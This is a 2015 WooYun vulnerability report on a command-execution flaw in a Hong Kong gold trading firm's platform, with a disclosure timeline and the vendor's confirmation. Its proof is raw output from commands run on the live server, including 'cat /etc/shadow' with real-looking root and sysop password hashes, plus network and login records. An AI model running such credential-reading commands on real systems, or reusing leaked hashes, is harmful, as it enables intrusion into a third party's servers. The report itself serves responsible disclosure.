当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152377

漏洞标题:金道投资控股有限公司撮合交易平台命令执行漏洞(香港地區)

相关厂商:金道投资控股有限公司

漏洞作者: 朱元璋

提交时间:2015-11-06 18:43

修复时间:2015-12-25 15:56

公开时间:2015-12-25 15:56

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-06: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商已经确认,细节仅向厂商公开
2015-11-20: 细节向核心白帽子及相关领域专家公开
2015-11-30: 细节向普通白帽子公开
2015-12-10: 细节向实习白帽子公开
2015-12-25: 细节向公众公开

简要描述:

金道集团的核心金融业务涵盖贵金属、证券、期货、外汇、资产管理五大范畴,分别以金道贵金属、金道投资、金道环球投资、金道资产管理四大品牌独立经营,致力为客户提供一站式电子金融服务。
金道贵金属有限公司(www.24k.hk)为香港金银业贸易场之认可电子交易行员(行员编号74号)及标准金集团成员。金道贵金属持有AA类别市场交易有效营业牌照,提供24小时现货黄金白银网上交易服务,并能铸造金道品牌的千足金条,是少数拥有特许铸金权的金商,实力媲美银行。
具体简介见官网http://www.24k.hk/zh/group_gw.html

详细说明:

0.png


地址https://**.**.**.**/webui/Home.action存在命令执行漏洞

0.png


漏洞证明:

-> ps -A
====================================================================================================================================
  PID TTY          TIME CMD
    1 ?        00:00:20 init
    2 ?        00:00:00 kthreadd
    3 ?        00:00:00 migration/0
    4 ?        00:02:43 ksoftirqd/0
    5 ?        00:00:00 migration/0
    6 ?        00:00:20 watchdog/0
    7 ?        00:00:01 migration/1
    8 ?        00:00:00 migration/1
    9 ?        00:04:40 ksoftirqd/1
   10 ?        00:00:16 watchdog/1
   11 ?        00:00:00 migration/2
   12 ?        00:00:00 migration/2
   13 ?        00:02:39 ksoftirqd/2
   14 ?        00:00:15 watchdog/2
   15 ?        00:00:01 migration/3
   16 ?        00:00:00 migration/3
   17 ?        00:02:38 ksoftirqd/3
   18 ?        00:00:15 watchdog/3
   19 ?        00:00:00 migration/4
   20 ?        00:00:00 migration/4
   21 ?        00:02:29 ksoftirqd/4
   22 ?        00:00:15 watchdog/4
   23 ?        00:00:01 migration/5
   24 ?        00:00:00 migration/5
   25 ?        00:02:28 ksoftirqd/5
   26 ?        00:00:15 watchdog/5
   27 ?        00:00:00 migration/6
   28 ?        00:00:00 migration/6
   29 ?        00:02:41 ksoftirqd/6
   30 ?        00:00:15 watchdog/6
   31 ?        00:00:01 migration/7
   32 ?        00:00:00 migration/7
   33 ?        00:02:21 ksoftirqd/7
   34 ?        00:00:15 watchdog/7
   35 ?        00:10:26 events/0
   36 ?        00:10:09 events/1
   37 ?        00:09:26 events/2
   38 ?        00:09:16 events/3
   39 ?        00:09:22 events/4
   40 ?        00:09:34 events/5
   41 ?        00:10:07 events/6
   42 ?        00:13:21 events/7
   43 ?        00:00:00 cgroup
   44 ?        00:00:00 khelper
   45 ?        00:00:00 netns
   46 ?        00:00:00 async/mgr
   47 ?        00:00:00 pm
   48 ?        00:00:56 sync_supers
   49 ?        00:01:20 bdi-default
   50 ?        00:00:00 kintegrityd/0
   51 ?        00:00:00 kintegrityd/1
   52 ?        00:00:00 kintegrityd/2
   53 ?        00:00:00 kintegrityd/3
   54 ?        00:00:00 kintegrityd/4
   55 ?        00:00:00 kintegrityd/5
   56 ?        00:00:00 kintegrityd/6
   57 ?        00:00:00 kintegrityd/7
   58 ?        00:02:16 kblockd/0
   59 ?        00:00:17 kblockd/1
   60 ?        00:01:19 kblockd/2
   61 ?        00:00:10 kblockd/3
   62 ?        00:01:22 kblockd/4
   63 ?        00:00:11 kblockd/5
   64 ?        00:01:31 kblockd/6
   65 ?        00:00:12 kblockd/7
   66 ?        00:00:00 kacpid
   67 ?        00:00:00 kacpi_notify
   68 ?        00:00:00 kacpi_hotplug
   69 ?        00:00:00 ata_aux
   70 ?        00:00:00 ata_sff/0
   71 ?        00:00:00 ata_sff/1
   72 ?        00:00:00 ata_sff/2
   73 ?        00:00:00 ata_sff/3
   74 ?        00:00:00 ata_sff/4
   75 ?        00:00:00 ata_sff/5
   76 ?        00:00:00 ata_sff/6
   77 ?        00:00:00 ata_sff/7
   78 ?        00:00:00 ksuspend_usbd
   79 ?        00:00:00 khubd
   80 ?        00:00:00 kseriod
   81 ?        00:00:00 md/0
   82 ?        00:00:00 md/1
   83 ?        00:00:00 md/2
   84 ?        00:00:00 md/3
   85 ?        00:00:00 md/4
   86 ?        00:00:00 md/5
   87 ?        00:00:00 md/6
   88 ?        00:00:00 md/7
   89 ?        00:00:00 md_misc/0
   90 ?        00:00:00 md_misc/1
   91 ?        00:00:00 md_misc/2
   92 ?        00:00:00 md_misc/3
   93 ?        00:00:00 md_misc/4
   94 ?        00:00:00 md_misc/5
   95 ?        00:00:00 md_misc/6
   96 ?        00:00:00 md_misc/7
   97 ?        00:00:00 linkwatch
   98 ?        00:00:16 khungtaskd
   99 ?        00:00:00 kswapd0
  100 ?        00:00:00 ksmd
  101 ?        00:00:43 khugepaged
  102 ?        00:00:00 aio/0
  103 ?        00:00:00 aio/1
  104 ?        00:00:00 aio/2
  105 ?        00:00:00 aio/3
  106 ?        00:00:00 aio/4
  107 ?        00:00:00 aio/5
  108 ?        00:00:00 aio/6
  109 ?        00:00:00 aio/7
  110 ?        00:00:00 crypto/0
  111 ?        00:00:00 crypto/1
  112 ?        00:00:00 crypto/2
  113 ?        00:00:00 crypto/3
  114 ?        00:00:00 crypto/4
  115 ?        00:00:00 crypto/5
  116 ?        00:00:00 crypto/6
  117 ?        00:00:00 crypto/7
  122 ?        00:00:00 kthrotld/0
  123 ?        00:00:00 kthrotld/1
  124 ?        00:00:00 kthrotld/2
  125 ? 
> chkconfig --list
====================================================================================================================================
abrt-ccpp      	0:off	1:off	2:off	3:on	4:off	5:on	6:off
abrt-oops      	0:off	1:off	2:off	3:on	4:off	5:on	6:off
abrtd          	0:off	1:off	2:off	3:on	4:off	5:on	6:off
acpid          	0:off	1:off	2:on	3:on	4:on	5:on	6:off
atd            	0:off	1:off	2:off	3:on	4:on	5:on	6:off
auditd         	0:off	1:off	2:on	3:on	4:on	5:on	6:off
autofs         	0:off	1:off	2:off	3:on	4:on	5:on	6:off
bacula-dir     	0:off	1:off	2:off	3:off	4:off	5:off	6:off
bacula-fd      	0:off	1:off	2:on	3:on	4:on	5:on	6:off
bacula-sd      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
blk-availability	0:off	1:on	2:on	3:on	4:on	5:on	6:off
certmonger     	0:off	1:off	2:off	3:on	4:on	5:on	6:off
cgconfig       	0:off	1:off	2:off	3:off	4:off	5:off	6:off
cgred          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
cpuspeed       	0:off	1:on	2:on	3:on	4:on	5:on	6:off
crond          	0:off	1:off	2:on	3:on	4:on	5:on	6:off
cups           	0:off	1:off	2:on	3:on	4:on	5:on	6:off
haldaemon      	0:off	1:off	2:off	3:on	4:on	5:on	6:off
ip6tables      	0:off	1:off	2:on	3:on	4:on	5:on	6:off
iptables       	0:off	1:off	2:off	3:off	4:off	5:off	6:off
irqbalance     	0:off	1:off	2:off	3:on	4:on	5:on	6:off
jexec          	0:off	1:on	2:on	3:on	4:on	5:on	6:off
kdump          	0:off	1:off	2:off	3:on	4:on	5:on	6:off
lsyncd         	0:off	1:off	2:on	3:on	4:on	5:on	6:off
lvm2-monitor   	0:off	1:on	2:on	3:on	4:on	5:on	6:off
mcelogd        	0:off	1:off	2:off	3:on	4:off	5:on	6:off
mdmonitor      	0:off	1:off	2:on	3:on	4:on	5:on	6:off
memcached      	0:off	1:off	2:on	3:on	4:on	5:on	6:off
messagebus     	0:off	1:off	2:on	3:on	4:on	5:on	6:off
netconsole     	0:off	1:off	2:off	3:off	4:off	5:off	6:off
netfs          	0:off	1:off	2:off	3:on	4:on	5:on	6:off
network        	0:off	1:off	2:on	3:on	4:on	5:on	6:off
nfs            	0:off	1:off	2:off	3:off	4:off	5:off	6:off
nfslock        	0:off	1:off	2:off	3:on	4:on	5:on	6:off
ntpd           	0:off	1:off	2:on	3:on	4:on	5:on	6:off
ntpdate        	0:off	1:off	2:on	3:on	4:on	5:on	6:off
numad          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
oddjobd        	0:off	1:off	2:off	3:off	4:off	5:off	6:off
portreserve    	0:off	1:off	2:on	3:on	4:on	5:on	6:off
postfix        	0:off	1:off	2:on	3:on	4:on	5:on	6:off
psacct         	0:off	1:off	2:off	3:off	4:off	5:off	6:off
quota_nld      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
rdisc          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
restorecond    	0:off	1:off	2:off	3:off	4:off	5:off	6:off
rngd           	0:off	1:off	2:off	3:off	4:off	5:off	6:off
rpcbind        	0:off	1:off	2:on	3:on	4:on	5:on	6:off
rpcgssd        	0:off	1:off	2:off	3:on	4:on	5:on	6:off
rpcsvcgssd     	0:off	1:off	2:off	3:off	4:off	5:off	6:off
rsyslog        	0:off	1:off	2:on	3:on	4:on	5:on	6:off
saslauthd      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
smartd         	0:off	1:off	2:off	3:off	4:off	5:off	6:off
snmpd          	0:off	1:off	2:on	3:on	4:on	5:on	6:off
snmptrapd      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
sshd           	0:off	1:off	2:on	3:on	4:on	5:on	6:off
sssd           	0:off	1:off	2:off	3:off	4:off	5:off	6:off
svnserve       	0:off	1:off	2:off	3:off	4:off	5:off	6:off
sysstat        	0:off	1:on	2:on	3:on	4:on	5:on	6:off
tomcat         	0:off	1:off	2:on	3:on	4:on	5:on	6:off
udev-post      	0:off	1:on	2:on	3:on	4:on	5:on	6:off
vmware-tools   	0:off	1:off	2:on	3:on	4:on	5:on	6:off
winbind        	0:off	1:off	2:off	3:off	4:off	5:off	6:off
ypbind         	0:off	1:off	2:off	3:off	4:off	5:off	6:off
-> cat /etc/shadow
====================================================================================================================================
root:$6$8/RuYe59$NfiS2pW111emmhThgk9TC7uRZjby3zUOGm5G43.K03EQ/vIwpps.SPekIMI4DPpB0PnNSdGm.4gDSEVuTD9Kl/:16647:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
lp:*:15980:0:99999:7:::
sync:*:15980:0:99999:7:::
shutdown:*:15980:0:99999:7:::
halt:*:15980:0:99999:7:::
mail:*:15980:0:99999:7:::
uucp:*:15980:0:99999:7:::
operator:*:15980:0:99999:7:::
games:*:15980:0:99999:7:::
gopher:*:15980:0:99999:7:::
ftp:*:15980:0:99999:7:::
nobody:*:15980:0:99999:7:::
dbus:!!:16323::::::
vcsa:!!:16323::::::
rpc:!!:16323:0:99999:7:::
abrt:!!:16323::::::
rpcuser:!!:16323::::::
nfsnobody:!!:16323::::::
haldaemon:!!:16323::::::
ntp:!!:16323::::::
saslauth:!!:16323::::::
postfix:!!:16323::::::
sshd:!!:16323::::::
tcpdump:!!:16323::::::
oprofile:!!:16323::::::
memcached:!!:16323:0:99999:7:::
sysop:$6$zyl2Bg.i$DOICV7Ml7NNTR.M.OP4mrUsqwjbbHq6EAkijWUScI6DyjjQx8biNM0EqsdbX.ZCHJMbtYXoyIUXhs3pNKnjOG/:16401:0:99999:7:::
-> ifconfig
====================================================================================================================================
eth0      Link encap:Ethernet  HWaddr 00:50:56:98:29:10  
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          inet6 addr: fe80::250:56ff:fe98:2910/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1495103914 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1107949047 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:164407782147 (153.1 GiB)  TX bytes:584593166139 (544.4 GiB)
lo        Link encap:Local Loopback  
          inet addr:**.**.**.**  Mask:**.**.**.**
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:324778 errors:0 dropped:0 overruns:0 frame:0
          TX packets:324778 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:19645632 (18.7 MiB)  TX bytes:19645632 (18.7 MiB)
-> cat /etc/resolv.conf
====================================================================================================================================
# Generated by NetworkManager
nameserver **.**.**.**
-> lsb_release -a
====================================================================================================================================
LSB Version:	:base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-noarch
-> lsof -i :22
====================================================================================================================================
COMMAND   PID USER   FD   TYPE   DEVICE SIZE/OFF NODE NAME
sshd    16472 root    3u  IPv4 62482450      0t0  TCP *:ssh (LISTEN)
sshd    16472 root    4u  IPv6 62482452      0t0  TCP *:ssh (LISTEN)
-> netstat -na
====================================================================================================================================
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State      
tcp        0      0 **.**.**.**:11211         **.**.**.**:*                   LISTEN      
tcp        0      0 **.**.**.**:9102                **.**.**.**:*                   LISTEN      
tcp        0      0 **.**.**.**:111                 **.**.**.**:*                   LISTEN      
tcp        0      0 **.**.**.**:22                  **.**.**.**:*                   LISTEN      
tcp        0      0 **.**.**.**:631               **.**.**.**:*                   LISTEN      
tcp        0      0 **.**.**.**:25                **.**.**.**:*                   LISTEN      
tcp        0      0 **.**.**.**:443           **.**.**.**:40792            SYN_RECV    
tcp        0      0 **.**.**.**:443           **.**.**.**:53204         SYN_RECV    
tcp        0      0 **.**.**.**:443           **.**.**.**:54024         SYN_RECV    
tcp        0      0 **.**.**.**:443           **.**.**.**:40857            SYN_RECV    
tcp        0      0 **.**.**.**:443           **.**.**.**:18502         SYN_RECV    
tcp        0      0 **.**.**.**:443           **.**.**.**:40855            SYN_RECV    
tcp        0      0 **.**.**.**:443           **.**.**.**:30134          SYN_RECV    
tcp        0      0 **.**.**.**:36895               **.**.**.**:*                   LISTEN      
tcp        0      0 **.**.**.**:199               **.**.**.**:*                   LISTEN      
tcp        0      0 **.**.**.**:11211         **.**.**.**:53515         ESTABLISHED 
tcp        0      0 **.**.**.**:11211         **.**.**.**:33982         ESTABLISHED 
tcp        0      0 **.**.**.**:11211         **.**.**.**:33986         ESTABLISHED 
tcp        0      0 **.**.**.**:11211         **.**.**.**:33992         ESTABLISHED 
tcp        0      0 **.**.**.**:11211         **.**.**.**:53517         ESTABLISHED 
tcp        0      0 **.**.**.**:11211         **.**.**.**:53523         ESTABLISHED 
tcp        0      0 **.**.**.**:11211         **.**.**.**:53521         ESTABLISHED 
tcp        0      0 **.**.**.**:11211         **.**.**.**:53519         ESTABLISHED 
tcp        0      0 **.**.**.**:11211         **.**.**.**:33990         ESTABLISHED 
tcp        0      0 **.**.**.**:11211         **.**.**.**:33984         ESTABLISHED 
tcp        0      0 **.**.**.**:11211         **.**.**.**:53511         ESTABLISHED 
tcp        0      0 **.**.**.**:11211         **.**.**.**:53513         ESTABLISHED 
tcp        0      0 **.**.**.**:11211         **.**.**.**:53525         ESTABLISHED 
tcp        0      0 **.**.**.**:11211         **.**.**.**:33994         ESTABLISHED 
tcp        0      0 **.**.**.**:11211         **.**.**.**:33996         ESTABLISHED 
tcp        0      0 **.**.**.**:11211         **.**.**.**:33988         ESTABLISHED 
tcp        0      0 :::111                      :::*                        LISTEN      
tcp        0      0 :::22                       :::*                        LISTEN      
tcp        0      0 ::1:631                     :::*                        LISTEN      
tcp        0      0 ::1:25                      :::*                        LISTEN      
tcp        0      0 :::443                      :::*                        LISTEN      
tcp        0      0 :::33502                    :::*                        LISTEN      
tcp        0      0 ::ffff:**.**.**.**:8005       :::*                        LISTEN      
tcp        0      0 ::ffff:**.**.**.**:443    ::ffff:**.**.**.**:41566   ESTABLISHED 
tcp        0      0 ::ffff:**.**.**.**:443    ::ffff:**.**.**.**:55788      FIN_WAIT2   
tcp        0      0 ::ffff:**.**.**.**:443    ::ffff:**.**.**.**:33010    ESTABLISHED 
tcp        0      0 ::ffff:**.**.**.**:443    ::ffff:**.**.**.**:52951  FIN_WAIT2   
tcp        0      0 ::ffff:**.**.**.**:443    ::ffff:**.**.**.**:60652 FIN_WAIT2   
tcp        0      0 ::ffff:**.**.**.**:443    ::ffff:**.**.**.**:11899 FIN_WAIT2   
tcp        0      0 ::ffff:192.168.76.
-> last
====================================================================================================================================
sysop    pts/0        **.**.**.**    Mon Oct 19 19:43 - 19:45  (00:01)    
sysop    pts/0        **.**.**.**     Wed Sep 23 21:52 - 09:46  (11:53)    
sysop    pts/0        **.**.**.**    Tue Sep  1 12:53 - 12:57  (00:04)    
root     pts/1                         Fri Jul 31 14:52    gone - no logout 
root     pts/0        **.**.**.**    Fri Jul 31 14:52 - 14:52  (00:00)    
root     pts/3                         Fri Jul 31 14:51    gone - no logout 
root     pts/2        **.**.**.**    Fri Jul 31 14:51 - 14:51  (00:00)    
root     pts/1                         Fri Jul 31 14:51 - 14:52  (00:00)    
root     pts/0        **.**.**.**    Fri Jul 31 14:51 - 14:51  (00:00)    
root     pts/3                         Fri Jul 31 14:51 - 14:51  (00:00)    
root     pts/2        **.**.**.**    Fri Jul 31 14:51 - 14:51  (00:00)    
root     pts/1                         Fri Jul 31 14:51 - 14:51  (00:00)    
root     pts/0        **.**.**.**    Fri Jul 31 14:51 - 14:51  (00:00)    
root     pts/1                         Sat Jul 25 10:07 - 14:51 (6+04:43)   
root     pts/0        **.**.**.**    Sat Jul 25 10:07 - 10:07  (00:00)    
root     pts/1                         Sat Jul 18 04:41 - 10:07 (7+05:26)   
root     pts/0        **.**.**.**    Sat Jul 18 04:41 - 04:41  (00:00)    
root     pts/0        **.**.**.**    Fri Jul 10 22:57 - 22:57  (00:00)    
root     pts/0        **.**.**.**    Mon Jul  6 01:57 - 01:57  (00:00)    
root     pts/0        **.**.**.**    Mon Jul  6 01:57 - 01:57  (00:00)    
root     pts/0        **.**.**.**    Mon Jul  6 01:56 - 01:56  (00:00)    
root     pts/0        **.**.**.**    Fri Jul  3 18:58 - 18:58  (00:00)    
root     pts/0        **.**.**.**    Thu Jun 25 19:42 - 19:42  (00:00)    
root     pts/0        **.**.**.**    Thu Jun 18 15:39 - 15:39  (00:00)    
root     pts/0        **.**.**.**    Thu Jun 18 00:55 - 00:55  (00:00)    
root     pts/0        **.**.**.**    Thu Jun 18 00:55 - 00:55  (00:00)    
root     pts/0        **.**.**.**    Thu Jun 18 00:54 - 00:54  (00:00)    
root     pts/0        **.**.**.**    Thu Jun 18 00:54 - 00:54  (00:00)    
root     pts/0        **.**.**.**    Wed Jun 17 22:50 - 22:50  (00:00)    
root     pts/0        **.**.**.**    Wed Jun 17 22:47 - 22:48  (00:00)    
root     pts/0        **.**.**.**    Wed Jun 17 22:39 - 22:40  (00:00)    
root     pts/0        **.**.**.**    Wed Jun 17 18:25 - 18:25  (00:00)    
root     pts/0        **.**.**.**    Wed Jun 17 18:25 - 18:25  (00:00)    
root     pts/0        **.**.**.**    Wed Jun 17 18:24 - 18:24  (00:00)    
root     pts/0        **.**.**.**    Wed Jun 17 18:24 - 18:24  (00:00)    
root     pts/0        **.**.**.**    Wed Jun 17 16:18 - 16:20  (00:01)    
root     pts/0        **.**.**.**    Sat Jun 13 12:38 - 12:38  (00:00)    
root     pts/0        **.**.**.**    Sat Jun 13 12:38 - 12:38  (00:00)    
root     pts/0        **.**.**.**    Sat Jun 13 12:37 - 12:37  (00:00)    
root     pts/0        **.**.**.**    Thu Jun 11 11:22 - 11:22  (00:00)    
root     pts/0        **.**.**.**    Thu Jun  4 07:13 - 07:13  (00:00)    
root     pts/0        **.**.**.**    Thu May 28 03:22 - 03:22  (00:00)    
root     pts/0        **.**.**.**    Thu May 21 01:14 - 01:14  (00:00)    
sysop    pts/0        **.**.**.**    Wed May 20 16:00 - 16:31  (00:31)    
sysop    pts/1        **.**.**.**     Wed May 20 12:21 - 13:03  (00:41)    
sysop    pts/0        **.**.**.**    Wed May 20 11:50 - 13:04  (01:14)    
root     pts/0        **.**.**.**    Tue May 19 00:41 - 00:41  (00:00)    
root     pts/0        **.**.**.**    Tue May 19 00:41 - 00:41  (00:00)    
root     pts/0        **.**.**.**    Tue May 19 00:40 - 00:40  (00:00)    
root     pts/0        **.**.**.**    Wed May 13 23:14 - 23:14  (00:00)    
root     pts/0        **.**.**.**    Wed May  6 21:03 - 21:03  (00:00)    
root     pts/0        **.**.**.**    Wed Apr 29 19:04 - 19:04  (00:00)    
root     pts/0        **.**.**.**    Thu Apr 23 16:13 - 16:13  (00:00)    
root     pts/0

修复方案:

加强安全意识

版权声明:转载请注明来源 朱元璋@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-11-10 15:55

厂商回复:

已將事件通知有關機構

最新状态:

暂无

漏洞评价:

评价